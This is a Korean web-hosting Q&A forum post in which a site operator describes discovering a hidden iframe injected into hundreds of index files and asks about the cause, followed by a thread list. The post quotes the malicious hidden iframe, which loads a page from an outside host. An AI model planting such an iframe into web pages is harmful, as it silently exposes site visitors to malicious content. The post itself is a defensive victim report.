묻고답하기

아래에도 어떤 분(디따마니님)이 글 올리셨습니다만은..

사실 저도 좀전에 관리하는 사이트가 동일한 증상을 보여서 애좀 먹었거든요..

아시는분은 아실겁니다.. 주위에도 여럿 당했더라고요

오늘 갑자기 사이트가 안열리길래 어? 왜이러지?   하면서 이것저것 소스도 보고 해봐도 아무런 문제가 없는데

왜 안됄까.. 하다가 호스팅업체에 문의도해보고 다 해봐도 모르겠더라고요..

그러다가 계속 찾아본결과(인터넷검색)   알게되었습니다..

바로..  

인덱스파일이나 메인파일 끝에  

<iframe src="./http://u1j.in:8080/ts/in.cgi?pepsi109" width=125 height=125 style="visibility: hidden"></iframe>

위와 같은 소스를 집어넣는 별 희한한 경우인데요    보통  소스 끝에는 8080이 들어가구..

사이트가 한마디로 난리가 나버리는거죠..  성인사이트가 열리기도 하고...

저는 지금껏 이런일들을 남의일로만 생각했는데 직접 당해보니 정말 황당하더군요.

손댄적도 없는데 수백개의 파일에 저코드가 들어가버렸으니..  정말 어이가 없더라고요..

몇시간 사투끝에(사실 노가다였죠 ㅡ,.ㅡ)  겨우겨우 어느정도 복구는했습니만은 

아직도 문제가 많습니다..   최근에 백업을 안해놔서리..

아랫분도 말씀하신것처럼 xe에 보안상에 취약점이 있어서 그런다고 하는데..  

정말 그런걸까요?  저는 cafe24측에 문제가 있는것 같던데   그쪽에서는 아니라고 하고..  

혹시 퍼미션 문제일까요?  아니면내 컴퓨터가 해킹당한걸까요?  

일단 ftp비밀번호는 바꿨습니다.. 호스팅업체에서 그렇게 하라고 하더라고요

정말 또 당할까봐 정말 두렵네요.. -_-;  

글쓴이 제목 최종 글
XE 공지 글 쓰기,삭제 운영방식 변경 공지 [16] 2019.03.05 by 남기남
toontoon admin페이지에 못들어갑니다. [2] 2009.08.07 by taihee
어쭈구리メ xe 게시판 스킨 쓰고 있는데요.. file  
이향자 회원가입폼 수정하려고하는데 php어떤파일인지좀.. [5] 2009.08.07 by minion
강철심장 게시판에 글쓰면 다른 게시판에 글이 자동등록되는..  
바이블인사이드 xe 의심각한 보안취약? [3] 2009.08.07 by 걸려봤어요
느까끼 홈페이지 한번 살펴봐주세요. [4] 2009.08.07 by 황부호
폼첩쿤 스크립트 함수/변수를 호출하지 못하였습니다. file  
바람의매 글쓰기 댓글 숫자 제한 어떻게하나여  
물고기153마리 1차메뉴에 이런 문제가 생겼어요... 급합니다. file  
진수짱 ㅠㅠ 관리자 모드에서....에러 뜨는건...  
싸나이김 제로보드 게시판 본문에 글 넣는 방법요`좀갈쳐주세요~ [2] file 2009.08.07 by 싸나이김
bcpt 이 문제를 풀어 주시는 분은 정말 은인으로 생각을 +_+;; file  
고집불통 권한 구분?? [2] 2009.08.07 by 고집불통
번거러워서... 텍스타일의 경량화형은 없나요. [1] 2009.08.07 by zero
brian iframe 침입 당했는데요. [3] 2009.08.07 by 개돌
Ahsoft 사진 클릭시 새창에서 뜨게 하는 방법은 없나요? [1] 2009.08.07 by doovoo
doovoo 도메인 호스팅 후... 이런 문제가 생기네요. [1] 2009.08.07 by doovoo
햄토리 자꾸 제홈페이지로 링크되여..ㅠㅠ  
티하이 https 셋팅 문제인데요/./. [4] 2009.08.07 by 티하이
롱코트ew 포인트제에서 다운로드는... [6] 2009.08.07 by 롱코트ew
포카리 백성찬님, 게시판 글 이전과 관련해서요 [3] 2009.08.07 by 우리아기
대한정보통신 설치하기에관하여.... [2] 2009.08.07 by 현상을 이론으로
솔파도 헉~! 왜 다른 레이아웃들을 적용을 못하는거죠? [1] 2009.08.07 by 현상을 이론으로
초보자 이미지 가운데 정렬 질문.. [2] 2009.08.07 by 현상을 이론으로
지식창고★ 도와주세요 ^^ [3] file 2009.08.07 by 현상을 이론으로
김태용 레이아웃 질문이에요..  
아리선고 초보자 질문입니다.  
모르시 textyle 사이즈 조절... [1] file 2009.08.07 by 현상을 이론으로
초보거든요 exobud 페이지이동시 고정되게 소스좀 알려주세요 [1] 2009.08.07 by 현상을 이론으로
흑묘백묘 동영상 삽입문제 [1] file 2009.08.07 by 현상을 이론으로